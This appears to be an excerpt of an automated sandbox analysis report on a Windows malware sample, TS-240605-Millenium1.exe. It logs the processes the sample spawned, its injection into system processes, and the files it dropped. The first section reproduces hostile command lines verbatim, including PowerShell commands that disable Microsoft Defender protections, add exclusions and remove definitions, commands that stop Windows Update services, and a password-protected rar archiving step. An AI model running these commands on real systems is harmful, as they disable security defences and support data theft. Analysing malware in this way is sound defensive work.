                                  Source: C:\Windows\System32\lsass.exeMemory written: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe base: 268650A0000
                                  Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 10E62480000
                                  Source: C:\Users\user\Desktop\TS-240605-Millenium1.exeProcess created: C:\Users\user\Desktop\TS-240605-Millenium1.exe "C:\Users\user\Desktop\TS-240605-Millenium1.exe"Jump to behavior
                                  Source: C:\Users\user\Desktop\TS-240605-Millenium1.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c start C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exe -pbeznogymJump to behavior
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exe C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exe -pbeznogymJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exeProcess created: C:\ProgramData\Microsoft\hacn.exe "C:\ProgramData\Microsoft\hacn.exe" Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exeProcess created: C:\ProgramData\Microsoft\based.exe "C:\ProgramData\Microsoft\based.exe" Jump to behavior
                                  Source: C:\ProgramData\Microsoft\hacn.exeProcess created: C:\ProgramData\Microsoft\hacn.exe "C:\ProgramData\Microsoft\hacn.exe" Jump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\ProgramData\Microsoft\based.exe "C:\ProgramData\Microsoft\based.exe" Jump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI78122\rar.exe a -r -hp"prometheus" "C:\Users\user\AppData\Local\Temp\wpNXr.zip" *"Jump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic os get Caption"Jump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"Jump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: unknown unknownJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: unknown unknownJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: unknown unknownJump to behavior
                                  Source: C:\ProgramData\Microsoft\hacn.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c start C:\Users\user\AppData\Local\Temp\_MEI78002\s.exe -pbeznogymJump to behavior
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\_MEI78002\s.exe C:\Users\user\AppData\Local\Temp\_MEI78002\s.exe -pbeznogymJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI78002\s.exeProcess created: C:\ProgramData\main.exe "C:\ProgramData\main.exe" Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI78002\s.exeProcess created: C:\ProgramData\svchost.exe "C:\ProgramData\svchost.exe" Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI78002\s.exeProcess created: C:\ProgramData\setup.exe "C:\ProgramData\setup.exe" Jump to behavior
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'Jump to behavior
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                                  Source: C:\ProgramData\main.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Local\Temp\tmp3F5C.tmp.bat & Del C:\Users\user\AppData\Local\Temp\tmp3F5C.tmp.bat
                                  Source: C:\ProgramData\svchost.exeProcess created: C:\ProgramData\svchost.exe "C:\ProgramData\svchost.exe"
                                  Source: C:\ProgramData\setup.exeProcess created: C:\Windows\System32\dialer.exe C:\Windows\System32\dialer.exe
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
                                  Source: C:\ProgramData\svchost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "ver"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\_MEI78122\rar.exe C:\Users\user\AppData\Local\Temp\_MEI78122\rar.exe a -r -hp"prometheus" "C:\Users\user\AppData\Local\Temp\wpNXr.zip" *
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop UsoSvc
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop WaaSMedicSvc
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop wuauserv
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop bits
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop dosvc
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe Tasklist /fi "PID eq 5064"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find ":"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe Timeout /T 1 /Nobreak
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe Tasklist /fi "PID eq 5064"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find ":"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe Timeout /T 1 /Nobreak
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe Tasklist /fi "PID eq 5064"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find ":"
                                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe Tasklist /fi "PID eq 5064"
                                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic os get Caption
                                  Source: C:\Program Files\Google\Chrome\updater.exeProcess created: unknown unknown
                                  Source: C:\Program Files\Google\Chrome\updater.exeProcess created: unknown unknown
                                  Source: C:\Program Files\Google\Chrome\updater.exeProcess created: unknown unknown
                                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend && powershell set-mppreference -submitsamplesconsent 2 & "%programfiles%\windows defender\mpcmdrun.exe" -removedefinitions -all"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend && powershell set-mppreference -submitsamplesconsent 2 & "%programfiles%\windows defender\mpcmdrun.exe" -removedefinitions -all"Jump to behavior
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend
                                  Source: main.exe, 00000015.00000000.1914340821.0000025EB5A32000.00000002.00000001.01000000.00000022.sdmpBinary or memory string: Shell_TrayWnd

                                  Language, Device and Operating System Detection

                                  barindex
                                  Source: Yara matchFile source: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe, type: DROPPED
                                  Source: Yara matchFile source: C:\ProgramData\main.exe, type: DROPPED
                                  Source: C:\Users\user\Desktop\TS-240605-Millenium1.exeCode function: 0_2_00007FF6CEB4A620 cpuid 0_2_00007FF6CEB4A620
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exeCode function: GetLocaleInfoW,GetNumberFormatW,5_2_0037D0AB
                                  Source: C:\Users\user\Desktop\TS-240605-Millenium1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75642\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\Users\user\Desktop\TS-240605-Millenium1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75642\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\Users\user\Desktop\TS-240605-Millenium1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75642\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\Users\user\Desktop\TS-240605-Millenium1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75642\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\Users\user\Desktop\TS-240605-Millenium1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75642\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\Users\user\Desktop\TS-240605-Millenium1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75642\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\Users\user\Desktop\TS-240605-Millenium1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75642\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\Users\user\Desktop\TS-240605-Millenium1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75642\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\Users\user\Desktop\TS-240605-Millenium1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75642\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\Users\user\Desktop\TS-240605-Millenium1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75642\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\Users\user\Desktop\TS-240605-Millenium1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75642\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\Users\user\Desktop\TS-240605-Millenium1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75642\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\Users\user\Desktop\TS-240605-Millenium1.exeQueries volume information: C:\Users\user\Desktop\TS-240605-Millenium1.exe VolumeInformationJump to behavior
                                  Source: C:\Users\user\Desktop\TS-240605-Millenium1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75642 VolumeInformationJump to behavior
                                  Source: C:\Users\user\Desktop\TS-240605-Millenium1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75642 VolumeInformationJump to behavior
                                  Source: C:\Users\user\Desktop\TS-240605-Millenium1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75642 VolumeInformationJump to behavior
                                  Source: C:\Users\user\Desktop\TS-240605-Millenium1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75642 VolumeInformationJump to behavior
                                  Source: C:\Users\user\Desktop\TS-240605-Millenium1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75642\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\Users\user\Desktop\TS-240605-Millenium1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exe VolumeInformationJump to behavior
                                  Source: C:\Users\user\Desktop\TS-240605-Millenium1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75642\libcrypto-3.dll VolumeInformationJump to behavior
                                  Source: C:\Users\user\Desktop\TS-240605-Millenium1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75642\python311.dll VolumeInformationJump to behavior
                                  Source: C:\Users\user\Desktop\TS-240605-Millenium1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75642\select.pyd VolumeInformationJump to behavior
                                  Source: C:\Users\user\Desktop\TS-240605-Millenium1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75642\unicodedata.pyd VolumeInformationJump to behavior
                                  Source: C:\Users\user\Desktop\TS-240605-Millenium1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75642\VCRUNTIME140.dll VolumeInformationJump to behavior
                                  Source: C:\Users\user\Desktop\TS-240605-Millenium1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75642\_bz2.pyd VolumeInformationJump to behavior
                                  Source: C:\Users\user\Desktop\TS-240605-Millenium1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75642\_hashlib.pyd VolumeInformationJump to behavior
                                  Source: C:\Users\user\Desktop\TS-240605-Millenium1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75642\_lzma.pyd VolumeInformationJump to behavior
                                  Source: C:\Users\user\Desktop\TS-240605-Millenium1.exeQueries volume information: C:\Users\user\Desktop\TS-240605-Millenium1.exe VolumeInformationJump to behavior
                                  Source: C:\Users\user\Desktop\TS-240605-Millenium1.exeQueries volume information: C:\Users\user\Desktop\TS-240605-Millenium1.exe VolumeInformationJump to behavior
                                  Source: C:\Users\user\Desktop\TS-240605-Millenium1.exeQueries volume information: C:\Users\user\Desktop\TS-240605-Millenium1.exe VolumeInformationJump to behavior
                                  Source: C:\Users\user\Desktop\TS-240605-Millenium1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75642\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\Users\user\Desktop\TS-240605-Millenium1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75642\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\Users\user\Desktop\TS-240605-Millenium1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75642\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\Users\user\Desktop\TS-240605-Millenium1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75642\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\Users\user\Desktop\TS-240605-Millenium1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75642\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\Users\user\Desktop\TS-240605-Millenium1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75642\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\Users\user\Desktop\TS-240605-Millenium1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75642\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\Users\user\Desktop\TS-240605-Millenium1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75642\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\Users\user\Desktop\TS-240605-Millenium1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75642\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\Users\user\Desktop\TS-240605-Millenium1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75642\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\Users\user\Desktop\TS-240605-Millenium1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75642\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\Users\user\Desktop\TS-240605-Millenium1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75642\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\Users\user\Desktop\TS-240605-Millenium1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75642\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\Users\user\Desktop\TS-240605-Millenium1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75642\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\Users\user\Desktop\TS-240605-Millenium1.exeQueries volume information: C:\Users\user\Desktop\TS-240605-Millenium1.exe VolumeInformationJump to behavior
                                  Source: C:\Users\user\Desktop\TS-240605-Millenium1.exeQueries volume information: C:\Users\user\Desktop\TS-240605-Millenium1.exe VolumeInformationJump to behavior
                                  Source: C:\Users\user\Desktop\TS-240605-Millenium1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75642\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\Users\user\Desktop\TS-240605-Millenium1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75642\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\Users\user\Desktop\TS-240605-Millenium1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75642\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\Users\user\Desktop\TS-240605-Millenium1.exeQueries volume information: C:\Users\user\Desktop\TS-240605-Millenium1.exe VolumeInformationJump to behavior
                                  Source: C:\Users\user\Desktop\TS-240605-Millenium1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75642\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\Users\user\Desktop\TS-240605-Millenium1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75642\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\Users\user\Desktop\TS-240605-Millenium1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75642\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\Users\user\Desktop\TS-240605-Millenium1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75642\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\Users\user\Desktop\TS-240605-Millenium1.exeQueries volume information: C:\Users\user\Desktop\TS-240605-Millenium1.exe VolumeInformationJump to behavior
                                  Source: C:\Users\user\Desktop\TS-240605-Millenium1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75642\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\Users\user\Desktop\TS-240605-Millenium1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75642\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\Users\user\Desktop\TS-240605-Millenium1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75642\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\Users\user\Desktop\TS-240605-Millenium1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75642\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\Users\user\Desktop\TS-240605-Millenium1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75642\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\Users\user\Desktop\TS-240605-Millenium1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75642\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\Users\user\Desktop\TS-240605-Millenium1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75642\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\Users\user\Desktop\TS-240605-Millenium1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75642\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\Users\user\Desktop\TS-240605-Millenium1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75642\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\Users\user\Desktop\TS-240605-Millenium1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75642\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\Users\user\Desktop\TS-240605-Millenium1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75642\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\Users\user\Desktop\TS-240605-Millenium1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75642\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\Users\user\Desktop\TS-240605-Millenium1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75642\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\Users\user\Desktop\TS-240605-Millenium1.exeQueries volume information: C:\Users\user\Desktop\TS-240605-Millenium1.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122 VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122 VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122 VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122 VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\_ctypes.pyd VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122 VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\blank.aes VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\libcrypto-3.dll VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\libffi-8.dll VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\libssl-3.dll VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\python311.dll VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\rar.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\sqlite3.dll VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\base_library.zip VolumeInformationJump to behavior
